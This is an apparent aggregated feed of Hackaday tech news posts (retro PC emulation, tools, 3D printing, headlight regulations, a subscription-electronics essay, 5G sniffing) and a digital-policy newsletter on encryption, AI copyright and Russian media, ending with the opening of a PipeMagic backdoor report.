youtube.com/embed/dADi1DFhypU?…


hackaday.com/2025/08/18/silent…


The PC In Your Pico


We’re all used to emulating older computers here, and we’ve seen plenty of projects that take a cheap microcontroller and use it to emulate a classic home computer or gaming platform. They’re fun, but serve mostly as a way to relive old toys.

As microcontrollers become faster, though, it’s inevitable that the machines they can emulate become more powerful too, so we’re moving into the realm of emulating productivity machines from years past. An example is [Ilya Maslennikov]’s pico-286, which as its name suggests, is a 286 PC emulator for the Raspberry Pi Pico.

It has an impressive set of sound and video card emulations, can drive either a VGA or an HDMI monitor, and uses a PS/2 keyboard and mouse. If DOS games are your thing it should provide what you want, but it’s caught our eye because there was a time when a 286 DOS PC was a productivity machine. There’s a huge library of still-useful software for DOS, and thus the prospect of a handheld DOS PC still has some appeal. We’d love to see someone put this in a badge.

MS-DOS may no longer be for sale, but there are several ways to land an open-source DOS in 2025. FreeDOS is something of a powerhouse.


hackaday.com/2025/08/18/the-pc…


Adjustable Allen Key After All These Years


The Allen key turns 115 this year. It’s strange to believe that in all that time, no one has come up with an adjustable version, but apparently true. Luckily [Chronova Engineering] has taken up the challenge in his latest video.

The video is a fascinating glimpse at the toolmaker’s art–manual machining and careful human judgement. Humans being the fallible creatures we are, the design goes through a few iterations. After the first failure in metal, [Chronova] falls back on 3D printing to rapidly prototype the next six iterations. Given how much work goes into manually machining the designs, we can only imagine the time savings that represents.

The final version has a classic hexagonal rod split in two, so that a chisel-shaped rod can spread the two prongs out to engage the sides of the Allen bolt. Even with that settled, the prongs and wedge had to be redesigned several times to find the exact shape and heat-treatment that would work. At this point the range is anything between 4 mm and 6 mm, which is admittedly narrow, but [Chronova Engineering] believes the mechanism has the potential to go wider.

The design is not being patented, but the drawings are available via the [Chronova Engineering] Patreon if you really need an adjustable Allen key and don’t feel like reverse-engineering the mechanism from video. It’s a much larger project than we’ve featured from this channel before– enormous, really, compared to steam engines that fit on pencil erasers or electric motors that squeeze through the eye of a needle.

Our thanks to hall-of-fame tipster [Keith Olson] for letting us know about this one. If you want a slice of that fame for yourself, the tips line is always open.

youtube.com/embed/8IewMXUzt7U?…


hackaday.com/2025/08/18/adjust…


I, 3D Printer


Like many of us, [Ben] has too many 3D printers. What do you do with the old ones? In his case, he converted it into a robotic camera rig. See the results, including footage from the robot, in the video below. In addition to taking smooth video, the robot can spin around to take photos for photogrammetry.

In fact, the whole thing started with an idea of building a photogrammetry rig. That project didn’t go as well as planned, but it did lead to this interesting project.

Motion control used to be exotic, but 3D printers really put it in the mainstream. The printer has motors, lead screws, gears, and belts. Of course, there are plenty of 3D printed parts, too. He did buy a few new pieces of extrusion and some longer belts. In addition, he had to upgrade one stepper to one that uses gears.

The camera tilts plus or minus 90 degrees on what used to be the X axis. The Y axis moves the camera forward and backward. The Z axis still moves up and down, but the extruder motor has a new job.

The extruder motor rotates the target object. Originally, the plan was to spin the camera, but that was difficult since the ring is 18 inches across. In addition to reliably moving it, there’s the wire management to worry about, too. So even though the original plan was to rotate the camera, the final project rotates the object on a turntable.

After prototyping with the 3D printer, he had an outside service CNC many of the parts in metal, both for the appearance and for the rigidity. But we imagine it would be fine with good-quality 3D printed parts.

Overall, a nice way to upcycle an old printer. We didn’t see the design files for any of the parts, but you’d probably have to customize your approach anyway. We’ve seen plenty of these camera rigs. Some of them recycle other tech.

youtube.com/embed/Qk4X3khyoXI?…


hackaday.com/2025/08/18/i-3d-p…


2025 One Hertz Challenge: Timekeeping at One Becquerel


The Becquerel (Bq) is an SI unit of radioactivity: one becquerel is equivalent to one radioactive decay per second. That absolutely does not make it equivalent to one hertz — the random nature of radioactive decay means you’ll never get one pulse every second — but it does make it interesting. [mihai.cuciuc] certainly thought so, when he endeavored to create a clock that would tick at one becquerel.

The result is an interesting version of a Vetinari Clock, first conceived of by [Terry Pratchett] in his Discworld books. In the books, the irregular tick of the clock is used by Lord Vetinari as a form of psychological torture. For some reason, imposing this torture on ourselves has long been popular amongst hackers.

Without an impractical amount of shielding, any one-becquerel source would be swamped by background radiation, so [mihai] had to get creative. Luckily, he is the creator of the Pomelo gamma-ray spectroscope, which allowed him to be discriminating. He’s using an Am-241 source, but just looking for the characteristic 59.5 keV gamma rays was not going to cut it at such a low count rate. Instead he’s using two of the Pomelo solid-state scintillation detectors as a coincidence detector, with one tuned for the Am-241’s alpha emissions. When both detectors go off simultaneously, that counts as an event and triggers the clock to tick.

How he got exactly one becquerel of activity is a clever hack, too. The Am-241 source he has is far more active than one decay per second, but by varying the distance from the gamma detector he was able to cut down to one detection per second using the inverse square law and the shielding provided by Earth’s atmosphere. The result is a time signal that is a stable one hertz… if averaged over a long enough period. For now, anyway. As the Am-241 decays away, its activity decreases, and [mihai] admits the clock loses about 0.4 seconds per day.

While we won’t be giving the prize for accuracy in this contest, we are sure Lord Vetinari would be proud. The Geiger-counter sound effect you can hear in the demo video embedded below is a great touch. It absolutely increases the psychic damage this cursed object inflicts.

youtube.com/embed/x_zuBJ4F6ZQ?…



hackaday.com/2025/08/18/2025-o…


How Laser Headlights Died In The US


Automotive headlights started out burning acetylene, before regular electric lightbulbs made them obsolete. In due time, halogen bulbs took over, before the industry began to explore even newer technologies like HID lamps for greater brightness. Laser headlights stood as the next leap forward, promising greater visibility and better light distribution.

Only, the fairytale didn’t last. Just over a decade after laser headlights hit the market, they’re already being abandoned by the manufacturers that brought them to fruition. Laser headlights would end up fighting with one hand behind their back, and ultimately became irrelevant before they ever became the norm.

Bright Lights


Laser headlights were first announced by BMW in 2013, with the German company promising the technology would be available on its new halo car, the i8. Fellow German rivals Audi would end up pipping the Bavarians to the punch, launching the limited-production Audi R8 LMX with laser headlights just months before the i8 entered production. Both brands would later bring the technology to a range of luxury models, including sedans and SUVs.
Long-throw laser lights became an option on premium Audi and BMW vehicles. Credit: Audi
The prime selling point of laser headlights was that they could project a very bright, very focused beam a long way down the road. As we’ve explored previously, they achieved this by using blue lasers to illuminate yellow phosphors, creating a vibrant white light that could be bounced off a reflector and directed up to 600 m ahead of the vehicle. They weren’t so useful for low-beams, with that duty usually passed off to LEDs. However, they were perfect to serve as an ultra-efficient long-throw high beam that wouldn’t disrupt other road users, albeit with the aid of steerable headlamp assemblies and camera-based tracking systems.

Laser headlights were more expensive to produce, but were also far more capable than any conventional bulb in terms of throw distance. They were also more compact than just about any other automotive lighting technology, giving automotive designers far more freedom when creating a car’s front end. They were even able to outperform LEDs in the efficiency stakes. And yet, both Audi and BMW would come to abandon the technology.
A comparison from 2014 between BMW’s LED high beam (left) and laser high beam (right). Notice the far greater throw of the laser high beam. Credit: BMW
The culprit? Regulations. In particular, headlight rules enforced in the United States. The Federal Motor Vehicle Safety Standard rule 108 deems that headlight intensity must not exceed 150,000 candela, while beam range must not exceed 250 meters. These rules effectively mean that laser headlights can’t outperform older technologies without falling afoul of US regulations. The rules stand in stark contrast to European regulations, which allow headlights to reach up to 430,000 candela. In an echo of the sealed beam era, US regulations were once again stymying European innovation by being firmly stuck in the past.

Of course, US regulations don’t apply everywhere. European automakers could have kept pursuing laser headlight technology; however, other factors have also come into play. LED headlight technology has continued to improve, with newer models improving brightness and light distribution. Adaptive matrix LED headlights also allow sections of the headlight beam to be turned on and off at will to provide the best illumination without dazzling other road users.
It’s widely considered that Audi beat BMW to market with the laser headlights on the limited-edition R8 LMX, but BMW was the first to enter real series production with laser headlights on the i8. Credit: BMW
To that end, laser headlights are facing decline. While a few models in the Audi and BMW lineups still feature the headlights, both automakers are phasing them out for the future. Speaking on the matter last year, BMW’s large-car product manager, Andreas Suhrer, noted that solely LED-based designs were the future. “At the moment, we still have laser lighting on the G26 and the X7, but we don’t have future plans,” Suhrer stated. “The G60 and G61 do not have it, and the new 7 Series does not have it. I don’t think it’s completely done, but for the next models, we are making the LED Matrix lights our focus. The laser lights are pretty good with absolute range but the latest generation of Matrix LED lights does a better distribution.” Meanwhile, Audi released statements in 2024 noting that there were no plans to implement laser lighting modules in future product.

Ultimately, laser headlights were an expensive, fancy solution to a minor problem. Better high beams are surely a good thing, but given how rarely most motorists use them, they’re hardly a critical feature. Combine their high price and limited usability with the fact that one of the world’s largest car markets just made them useless, and it hardly made sense for Audi or BMW to continue pursuing this unique technology. They will go down as a luxury car curio, to be written about by bloggers every few decades as a reminder of what was once deemed cutting edge.


hackaday.com/2025/08/18/how-la…


Should You Try Printing with Polypropylene?


Of all the plastics that surround us on the daily, the one we hear least about in the 3D printing world is probably polypropylene (PP). Given that this tough, slightly flexible thermoplastic has characteristics you might want for your prints, the question is: why? [Lost in Tech] is not answering that question in a recent video; instead he’s showing us what we’re missing out on with a review of the material.

A look at the Material Safety Data Sheet and available material has [Lost in Tech] suggesting it won’t be (much) more toxic for you than PLA, but you still wouldn’t want to huff the fumes. The biggest issue printing PP is getting it to stick — glass beds and PEI are not your friend, but polypropylene tape is easy to find and makes a fine print surface. He reviews a few other options, but it looks like plain old tape is still your best bet if you can’t get a hold of a Prusa PP bed. The other big issue is shrinkage, but that’s hardly unique to PP and can be accounted for in the model.

Just because it can be used, that doesn’t mean it should be. [Lost in Tech] does make a good case for why you might want to use PP — for one thing, it doesn’t string much, in part because it’s not hygroscopic. That makes it great for those of us in humid climes who don’t want to always faff around with dry boxes, but also wonderful for parts that will be in touch with water. Polypropylene also has great chemical resistance for even scarier chemicals than dihydrogen monoxide. The “killer app” though, at least as far as [Lost in Tech] is concerned, is to use polypropylene with compliant mechanisms: it’s incredibly resilient to bending, and doesn’t fatigue easily. You might even call it a “flexible” filament, but unlike with TPU, you get a nice hard plastic to go with that flexibility.

If you’re interested in this somewhat-forgotten filament, we featured a “getting started” guide last year. You can even make your own polypropylene filament using non-medical “COVID” masks, but do be sure to wash them first. What do you think? Is it time to give PP another chance, or has the 3D printing world moved on?

youtube.com/embed/yN09iY9OXlc?…


hackaday.com/2025/08/18/should…


The Terminal Demise of Consumer Electronics Through Subscription Services


Open any consumer electronics catalog from around the 1980s to the early 2000s and you are overwhelmed by a smörgåsbord of devices, covering any audio-visual and similar entertainment and hobby needs one might have. Depending on the era you can find the camcorders, point-and-shoot film and digital cameras right next to portable music players, cellphones, HiFi sets and tower components, televisions and devices like DVD players and VCRs, all of them in a dizzying amount of brands, shapes and colors that are sure to fit anyone’s needs, desires and budget.

When by the late 2000s cellphones began to absorb more and more of the features of these devices alongside much improved cellular Internet access, these newly minted ‘smartphones’ were hailed as a technological revolution that combined so many consumer electronics into a single device. Unlike the relatively niche feature phones, smartphones absolutely took off.

Fast-forward more than a decade and the same catalogs now feature black rectangles identified respectively as smart phones, smart TVs and tablets, alongside evenly colored geometric shapes that identify as smart speakers and other devices. While previously the onus for this change was laid by this author primarily on the death of industrial design, the elephant in the room would seem to be that consumer electronics are suffering from a terminal disease: subscription services.

Ownership And Timeshare

Family watching television in their home, c. 1958 (Credit: Evert F. Baumgardner)
In the burgeoning consumer electronics world of the 1950s, everyone was into streaming audio-visual content. This being the once popular phenomenon that historians refer to as ‘radio’ and ‘television’, involving the purchase of a compatible device to receive said content on, which was being broadcast via the airwaves. Naturally, this was before the era of on-demand streaming, so you also had to subscribe to a service that would provide you with the time tables for when said content would be streamed.

Although you could buy vinyl records back then, these were relatively expensive even if you already had a record player. Fortunately, by the 1960s affordable cassette tapes for purchase of prerecorded content – as well as home recording – began to appear with Philips’ compact cassette as clear frontrunner.

By the 1970s home video recorders became affordable and surged in popularity by the 1980s and 1990s, with JVC’s VHS format enabling a massive market of both prerecorded content and of blank tapes to record any content from television broadcasts on for later perusal. At this point linear television and radio broadcasts had been largely superseded by people building up their personal audio-visual libraries in addition to borrowing tapes and later DVDs from video rental stores and public libraries.
The popular DEC VT100 terminal. (Credit: Jason Scott)
Until the 1970s digital computers were primarily a government and university thing, with businesses anxiously trying to get into the game as well to ease everything from payroll processing to inventory management and engineering. Due to the high cost – and large size – of digital computers at the time, it was more economical to use time-sharing. This changed over time from batch processing in the form of university students lugging stacks of punch cards around, to them setting themselves down in front of a terminal like the DEC VT100.

Although these computer terminals looked like computers to the lay person, they are little more than a screen and keyboard tied into I/O buffers that communicate with a remote central computer. With these terminals students could all log into their own student account on the university’s mainframe and thus stop pestering the sysadmins with their stacks of punch cards for an overdue assignment.

For government purposes the same terminal-based approach offered a good balance, while for businesses the target mainframe over at the time-sharing business was more easily accessed by something like dial-up due to the distances involved, with the mainframe’s owner charging for the used resources. This spread the expenses of owning and maintaining these early computers over as many users as possible while keeping costs low for businesses making use of these time-share services.
Casual home entertainment of the early 2000s with money being no objection. (Source: Wikimedia)
This lasted until the era of mass-produced home computers arrived by the late 1970s with microcomputers such as the Commodore PET, before culminating with the 1981 release of IBM’s 5150 Personal Computer (PC), which was decidedly the point when time-sharing of mainframes and the use of terminals had begun to rapidly fade. Within years every student, corporate worker and government employee could economically be given access to a fully capable computer system, whether in the form of a PC, Macintosh, MSX or something else, along with dedicated server systems tucked away in the business’ server room or under a desk somewhere.

Even children could now be given dedicated computers to play video games on, which would have seemed a frivolous waste of computing resources in the 1960s to anyone except university students.

Thus, as the 1980s rolled over into the 1990s it seemed like the future of technology had truly arrived, with every home potentially a true Mecca of computing power and audio-visual entertainment.

Terminal Decline

A contemporary living room. (Source: Wikimedia)
After most of the world celebrated the arrival of the new millennium in 2000, followed by the arrival of the 21st millennium a year later, the remaining euphoria of having made it to the future would quickly run into the quicksand pit of reality. After having had a quarter of the 21st century to sober up, it seems like this is the time to take a look back and question how in blazes’ name we got where we are today.

Over the past years, the living room has metamorphosed from something that looks lived in, into the modern-day living room that can alternatively be described as ‘clean’ or ‘sterile’. The theme here is ‘surfaces’, which preferentially are white, black, grey or some other inoffensive color.

As you enter such a living room to be audio-visually entertained, you will pick up the smart remote that turns on the smart TV. Except the TV is always on, as it is smart and probably is always listening and running firmware updates in the background anyway. Ignoring that, your choices of entertainment are:

  • A game console that is logged into your Nintendo, Sony or Xbox account with likely paid-for digital games and services
  • A video streaming service or two, or four, the overwhelming majority of which are subscription-only and/or force you to watch ads like in the good ol’ days of cable TV. Only the ads are much, much worse
  • Content streamed off your local NAS, if you’re a total nerd
  • A Blu-ray or DVD player if you’re old-fashioned and refuse to join the Digital-Only Content Age

The overwhelming majority of smart TV users are a recurring revenue source for streaming services, with the TV being the device purchased by the viewer in order to access said services. Much the same is true with modern game consoles, where you effectively must be logged into your online account to do much of anything with the console and an increasing number of games, if only to obtain the latest updates to fix bugs. This is triply so if you are one of those people who are into cloud gaming.

As you ignore that your smart TV is basically a cross between a very advanced VT100 terminal and a Telescreen, you glance at the glass-and-plastic slab in your hand as one of your friends just messaged you on a messaging app – which annoyingly again advertises a premium subscription account – about this rad new music album on this one streaming audio service. Fortunately you are already a member, so you add the album for later listening.

That your smart TV, game console, and smart phone are all just terminals for some remote server begins to sink in once your internet access has been cut off. You cannot stream any audio-visual content, and many of your video games outright refuse to run because of a lack of internet connectivity. Ditto for your smart speakers, which have begun to stubbornly ignore your calls for attention.

When you sigh and flip open your laptop to maybe do some work, you find that your software products refuse to even launch, as they absolutely needed to refresh their license key verification this instant. Feeling mildly upset by their accusations of you having pirated their over-priced software after forking over so much cash each month, you slam the laptop shut again. This is when you realize that your project files are stored safely on the now unreachable cloud storage account anyway.

Ultimately you find yourself just staring at the black rectangles and inoffensive geometric shapes that once entertained you or made you more productive, but which now have left you terrifyingly alone with your own thoughts. Maybe you will have to do something drastic soon, like try reading a book, drag out that old CD player, play chess against yourself, or do some sketching on paper. With a real pencil.

Shareholder Value


The move from a boxed copy of stand-alone software and physical products to something with a recurring monthly or annual cost has been a gradual one. Much of it can already be traced back to the overly optimistic days leading up to the dot-com bubble, when the internet was going to make everyone rich and the selling of online goods the new normal.

Although the resulting fallout from this bubble popping was rather extensive, it left the investors who escaped the catastrophe wiser and still positively slavering at the thought of using the Internet for unimaginable levels of that sweetest reward of all: recurring revenue, with people giving you their money every month just to keep what they mistakenly thought that they had purchased.

The challenge is of course that people in general like to own things, and are rather hesitant to buy into anything that makes them have fewer things. How do you make people voluntarily buy into owning less and less, with what they do own having fewer features? The answer would seem to lie in blinding them with shiny new features, while insisting that they really don’t need the features that you are about to remove or nerf.

For example, initially people loved the idea of a smartphone because it meant that they could carry around in their pocket a cellphone, a camcorder, photo camera, portable internet-capable computer, an FM radio, a music player and more, all in a single device. Unfortunately all of these functions have been nerfed in some way or form.

FM Radio


Although regular analog radio on the FM and AM bands has lost a lot of importance these days, having FM radio available can be incredibly useful. Consider being out somewhere with poor cell coverage, not wanting to use up your data allowance for the month, or when everything has gone sideways in the form of a hurricane and the local grid, internet and cell network have collapsed. Especially in the latter case it would be convenient if you could just open the FM radio app on your smartphone to tune into emergency broadcasts.

Unfortunately this feature has been purposefully disabled or left out by device manufacturers, with Apple having opted to not even add an FM radio to its custom SoCs. A quick look at a couple of major smartphone manufacturers over at GSM Arena for smartphones released in 2024 or 2025 featuring an FM radio only shows two, both budget Samsung models.

Typically only budget-level smartphones have an FM radio feature enabled, as one aspect of the FM radio feature is that it requires its own antenna, which generally is a set of headphones plugged into the 3.5 mm audio jack. This logically means that the survival chances of budget smartphone buyers are significantly higher during a natural disaster than for people buying iPhones or higher-end Samsung and Xiaomi phones.

Audio Jack

Generic USB-C to audio jack and USB-C charging adapter.
The analog audio from a 3.5 mm audio jack is a low-latency, high-fidelity way to experience audio, only limited by the used audio DAC and the headphones or in-ears plugged into the jack. This makes it rather baffling that it’s also among the most vilified features. The reason here isn’t that it compromises waterproofing, or impedes thinness or adds cost, but rather it gets dropped on higher-end smartphones because Apple dropped it to promote their Bluetooth headphones and others followed.

Unfortunately, Bluetooth audio is neither low-latency nor high-fidelity, with newer codecs like LDAC, AptX, and AAC slightly improving the audio quality over the default SBC codec, but keeping all the other compromises. Meanwhile a fraction of the USB-C connectors on phones support the alternative analog audio mode, returning an audio jack to the device with a dongle, yet not re-enabling the use of headphones as an FM antenna and also making it impossible to use the USB-C port for any data transfers, while making the entire setup significantly more clunky, just to get a previously eliminated port back on the device instead of just putting it on there in the first place.

SD Cards


An important feature of a digital camera and camcorder is being able to quickly get the data off it and onto a computer for processing and viewing. Unfortunately, insofar as smartphones supported SD card expansion, this at the very least required taking off the plastic back to swap cards. These days the SD card either shares space with the SIM card(s), or is eliminated altogether.

The idea here is of course to increase recurring revenue: the easiest way to get data onto a smartphone or off it is via the device manufacturer’s cloud storage solutions, with a minor fee to bump it up to a usable amount of storage. You’re also not supposed to load your own audio files onto the internal storage either, but use the paid-or-ad-supported streaming solution. Why would you want to be un-cool and not listen to losslessly streamed audio files mangled by some Bluetooth codec through the second pair of wireless in-ears of this month as the previous ones fell out somewhere?

Fortunately, the marketing is very convincing, as you can now listen to or watch anything that you want – as long as it’s available on the streaming service – and you can even use your voice to tell any of your smart devices to play a song or open a movie, because this is what the future looks like. Never mind that you do not technically own much any more, but at least you are happy.

Terminal Life


Probably the biggest question here is whether or not this terminalification is harmful. Sure, this change has meant that industrial design got effectively shivved in the proverbial dark alley – since the user interface of devices now lives on the device manufacturer’s servers – but you now have all these cool features. Things like a smart home full of Internet of Things devices, each of which is first and foremost a terminal for the manufacturer’s services, with local control an afterthought, if a thought at all.

Even governments and businesses haven’t managed to escape these changes with their own vortex back to the 1960s. Rather than using a dial-up modem to connect to a time-share mainframe, they now use a broadband Internet connection to connect to a time-share mainframe, except we now call it a ‘cloud’.

It’s often been said that the centralization and decentralization of computer technology in particular is cyclical, with the 1980s and 1990s forming the pinnacle of decentralization. If we are currently in a trough of terminal terminalification, then logically decentralization and determinalification should follow next. One could make the point here that the Right to Repair movement is part of this change, as it wrests control away from manufacturers.

Even so, we still have a long way to go if this is the next stop, with our current physical media revival kerfuffle being just one of the many things that we have to come to terms with. Between the glossy marketing and the often conflicting desires and needs of the average consumer, it’s probably anyone’s guess what the second quarter of the 21st century will look like for consumer electronics and beyond.


hackaday.com/2025/08/18/the-te…


The never-ending battle between safety and privacy


IT'S MONDAY AND THIS IS DIGITAL POLITICS. I'm Mark Scott, and in the doldrums of (a very hot!) August, I'm already planning for September. I'll be in Brussels the week of Sept. 8. If you're around for coffee, reach out here.

— Efforts to unpick encryption in the name of child protection are gaining ground again. The proposals are based on the fallacy that they won't undermine universal privacy rights.

— The Trump-Putin summit fall-out: A view from the Russian propaganda machine.

— Everything you need to know about the cottage industry of copyright lawsuits taking on AI companies.

Let's get started:


WHEN IS IT OK TO BREAK END-TO-END ENCRYPTION?


THERE ARE A FEW CONSTANTS IN LIFE. Death. Taxes. And — at least for digital policymakers — the never-ending battle between those seeking to weaken encryption technology in the name of public safety and those fearful that such attempts will undermine people's fundamental privacy rights.

Over the years (more from me in 2019 and again in 2023), this fight has led to strange bedfellows. Law enforcement types have partnered with child safety advocates to demand the likes of Meta and Apple open up their encrypted services to greater oversight — all in the name of protecting against terrorist threats and child sexual abuse material. In the other camp, Silicon Valley and privacy groups (not the easiest of allies) raise legitimate concerns that you can't just weaken such encryption technologies for the "good guys." Inevitably, the "bad guys," too, will gain access.

American officials have often wavered between both camps. Officials are torn between the political realities of online child safety and the economic realities of protecting American tech giants from non-US tech regulation.

But in Europe, the drumbeat for encryption-busting policies has gone from a soft hum to a loud bang.

The smaller scuffle is in the United Kingdom where the government told Apple earlier this year to grant its security services access to its encrypted systems under the country's Investigatory Powers Act. Those rules had long been on the books. But the powers to compel companies to open up had never been used via so-called "technical capability notices." Still, London is now backing off amid complaints from the White House — and wider efforts by the UK to strike digital-focused trade agreements with the United States.

There are still outstanding concerns that the UK's Online Safety Act, which also includes powers to force such encryption breaking in the name of public safety, may lead to a similar transatlantic stand-off. Ofcom, the British regulator in charge of that legislation, however, has always made clear it will only pursue such demands if/when a technology is developed that both allows for outside access while preserving the underlying encryption. In short, that's a technical impossibility, allowing the UK regulator to punt any politically-sensitive issues into the long grass.

And that takes us to the European Union.

Long-time Brussels watchers will know the bloc's attempt to thwart child sexual abuse material — often accessed via online platforms — remains the unwanted love-child (no pun intended) of European digital regulation. Those proposals were first put forward in 2022. Yet since then, the ever-present tussle between safety and privacy (see above) has seen the legislation ping-pong between consecutive rotating presidencies of the European Council, or grouping of EU member states that nominally runs the bloc's policy agenda.

In July, Denmark (in charge until the end of the year) restarted this encryption spat after proposing changes (HT: Euractiv) to the child sexual abuse material legislation. The major overhaul compared to the Polish EU Council presidency (which ran for the first half of 2025) was to include demands that companies with encrypted technology comply with so-called mandatory detection orders, or legal requirements to check people's (encrypted) messages for possible illegal content.

What's more, the draft text — to be voted on by EU member states in mid October — included potential requirements to carry out these checks on individuals' devices, and not when they were shared over the cloud. That led to hackles from both tech executives and privacy campaigners. For more on what that looks like, check out this post from Meta's one-time top Brussels lobbyist (and now a Finnish member of the European Parliament) Aura Salla.

For the Danes, this is all about kids' safety. Speaking in Denmark in late July, the country's justice minister, Peter Hummelgaard, said his aim was to protect the privacy of those affected by these heinous images. "We need to ask ourselves, at the end of the day, whose privacy is it that we're mostly concerned with?" he told reporters. "We need to compromise on these differing views" (between child safety and privacy campaigners.)

The Danish EU presidency's half-year priorities also make its objectives explicit. "The Presidency will focus on strengthening the abilities to make use of the digital development for law enforcement when fighting serious crime," the document reads. "The Presidency will work to ensure the protection of fundamental rights as well as cooperation and protection in the area of civil matters."

A lot can happen between now and the proposed vote in October. For one thing, not all EU member states agree with the Danes' proposals. Without unanimity, the current draft proposals — like so many before them via the Hungarian and Polish EU Presidencies — may never get passed. That's especially true if US politicians realize what is going on in Brussels and cause a stink.

The thing is, none of this politicking finds a solution for what are two clear realities.

On the one side, it is a fact that encrypted messaging services are used for illegality, including the spread of child sexual abuse material. If you don't believe me, read this report from Australia's eSafety Commissioner. On the other, governments can't break encryption technology without compromising people's privacy rights. There are technical solutions like "hashing" and "matching" that can stop the spread of known illegal content. But including backdoors in end-to-end encrypted services will only lead to greater harm.

What we are lacking is a clear conversation about what are uncomfortable trade-offs.

It's impossible to balance the needs of protecting children from online predatory behavior (more on that here) and wider society's expectations of a base level of privacy. To suggest that some sort of yet-created technology will thread the needle between those fundamental rights is farcical. Policymakers should acknowledge that, and have an honest conversation with citizens about what is the least-worst option.

My personal view is that the breaking of encryption — and therefore the weakening of wider privacy rights — is not the right way to go (at least not yet) to protect children online. There are less invasive policy choices like baking in "privacy by design" principles into online platforms that can mitigate some, but not all, of the potential harm. Should children be able to receive DMs from strangers? No. Should they be able to access services before they reach the minimum age? Also no.

Neither of those policy choices has been effectively implemented yet. To jump directly to the "let's read everyone's messages!" stage makes good politics. But it does not represent a grown-up approach to what are impossible trade-offs.

At some point, encryption may have to be broken. But before we get there, all other policy options should be exhausted. That includes forcing platforms to embed privacy-by-design principles into their services and finding privacy-conscious "age assurance" techniques to safeguard children from areas of the internet that should remain off-limits.

Until that happens, the rush to break encryption should be viewed for what it is: a politically-expedient sledgehammer to crack a nut.


Chart of the Week


THE LATEST AI SYSTEMS ARE ONLY AS GOOD as the data upon which they are trained. For many companies, that means scraping reams of copyrighted material from around the world.

Publishers claim this is a slam dunk case of copyright infringement. AI giants like Google, OpenAI and Microsoft argue their tactics fit within the "fair use" principle.

Soon, we'll know who's right.

There are currently 45 copyright lawsuits in the US between publishers and AI companies related to how such data is used to train large language models. For links to all the cases below, check out the "source" section in the chart.
Source: ChatGPT is Eating the World


THE TRUMP-PUTIN SUMMIT PROPAGANDA AFTERMATH


FOR ALMOST EVERYONE (outside of Donald Trump's administration), the Aug. 15 Russo-American summit was a major political victory for Vladimir Putin. The US president rejected those claims. Yet ahead of another round of meetings, this time in the White House on Aug. 18 with Western leaders and the Ukrainian president, Russia's state-backed media was again reframing quotes from leading US officials to meet Moscow's own political needs.

This has become a major trend in how the likes of Sputnik and RT speak to their international audiences.

Gone are the attacks on American imperialism, although those narratives still show up in Kremlin-backed media whose audiences span Latin America and French-speaking Africa. Instead, Moscow has been eager to frame the Aug. 15 summit as a win for both the US and Russia, while claiming it is now down to Volodymyr Zelenskyy, Ukraine's president, to find a solution to the bloody conflict in Eastern Europe.

That builds on public statements from Trump who claimed, in a social media post on Aug. 17, that Zelenskyy "can end the war with Russia almost immediately, if he wants to, or he can continue to fight." RT Mundo quickly jumped on that statement.

On RT, the English-language outlet, comments from Marco Rubio, the US Secretary of State, were picked up to suggest the war was "going to get worse" if Ukraine did not agree to a peace deal with Russia. In the outlet's German-language website, the Ukrainian president was also attacked over alleged corruption abuses — only weeks after Zelenskyy backtracked on new laws that would have undermined two national anti-corruption agencies.

For Russia's state media, the Aug. 15 summit between Trump and Putin was shaped as a meeting of like-minded leaders, both of whom secured something out of the half-day event. "Trump can now indefinitely postpone a disastrous trade war with India and China, which secondary sanctions on Russia would have triggered," read an opinion article on RT that subsequently called on Zelenskyy to reach a peace deal with the Russian president. "Putin, meanwhile, drove home the point that a temporary ceasefire is insufficient – that the time has come to talk about a full peace treaty."

Ahead of the planned Aug. 18 meetings in Washington, during which several European leaders are expected to travel alongside Zelenskyy to put pressure on Trump over any potential long-term peace deal, Russian state media highlighted Europe's alleged weaknesses. That included jumping on comments from Friedrich Merz, the German chancellor, about the bloc's role in any potential negotiations, as well as a social media post from Giuseppe Conte, a former Italian prime minister, that framed Europe as a mere "supporting actor."

Ever since Trump returned to the White House, the Kremlin's state-backed media has balanced its eagerness to demonstrate renewed kinship between Russia and the US and its wariness that, eventually, relations will break down (again) between the long-time adversaries.

That message came through in an opinion article written in RT en Français that both praised last week's summit, but reminded Russia it would need to promote its interests by strength if it wanted to secure its objectives in Ukraine. "It is now up to Russia, the last bulwark against total global dictatorship, to continue to defend its national interests," read the article. "It is simply important to understand that the meeting between the two presidents did not, in itself, magically resolve the conflict between these two worlds.

"In the end, there can only be one."


What I'm reading


— A group of independent research organizations published an in-depth analysis into the potential role of foreign manipulation in the recent Polish presidential election. More here.

— Casey Fiesler put together a series of social media-friendly tutorials on AI ethics. More here and why she did it here.

— Alexios Mantzarlis at the Indicator discovered dozens of TikTok accounts using AI avatars of real journalists to spread false information. More here.

— Anna Lenhart and Katie Shilton asked TikTok users about their awareness and potential concerns about researchers reviewing their social media posts. More here.

— Wikimedia lost a legal challenge against its attempt to be excluded from provisions within the UK's Online Safety Act. More here.



digitalpolitics.co/newsletter0…


Sniffing 5G with Software-Defined Radio


The fifth generation mobile communications protocol (5G) is perhaps the most complicated wireless protocol ever made. Featuring wildly fast download speeds, beam forming base stations, and of course non-standard additions, it’s a rather daunting prospect to analyze for the home hacker and researcher alike. But this didn’t stop the ASSET Research Group from developing a 5G sniffer and downlink injector.

The crux of the project is focused around real-time sniffing using one of two Universal Software Radio Peripheral (USRP) software-defined radios (SDRs), and a substantial quantity of compute power. This sniffed data can even be piped into Wireshark for filtering. The frequency is hard-coded into the sniffer for improved performance with the n78 and n41 bands having been tested as of writing. While we expect most of you don’t have the supported USRP hardware, they provided a sample capture file for anyone to analyze.

The other main feature of the project is an exploitation framework with numerous attack vectors developed by ASSET and others. By turning an SDR into a malicious 5G base station, numerous vulnerabilities and “features” can be exploited, with results ranging from downgrading the connection to 4G, fingerprinting and much more. It even includes an attack method we previously covered called 5Ghoul which can cause device failure requiring removal of the SIM Card. These vulnerabilities offer a unique look inside the inner workings of 5G.

If you too are interested in 5G sniffing but don’t have access to the hardware needed, check out this hack turning a Qualcomm phone into a 5G sniffer!


hackaday.com/2025/08/18/sniffi…


Evolution of the PipeMagic backdoor: from the RansomExx incident to CVE-2025-29824


In April 2025, Microsoft patched 121 vulnerabilities in its products. According to the company, only one of them was being used in real-world attacks at the time the patch was released: CVE-2025-29824. The exploit for this vulnerability was executed by the PipeMagic malware, which we first discovered in December 2022 in a RansomExx ransomware campaign. In September 2024, we encountered it again in attacks on organizations in Saudi Arabia. Notably, it was the same version of PipeMagic as in 2022. We continue to track the malware’s activity. Most recently, in 2025 our solutions prevented PipeMagic infections at organizations in Brazil and Saudi Arabia.

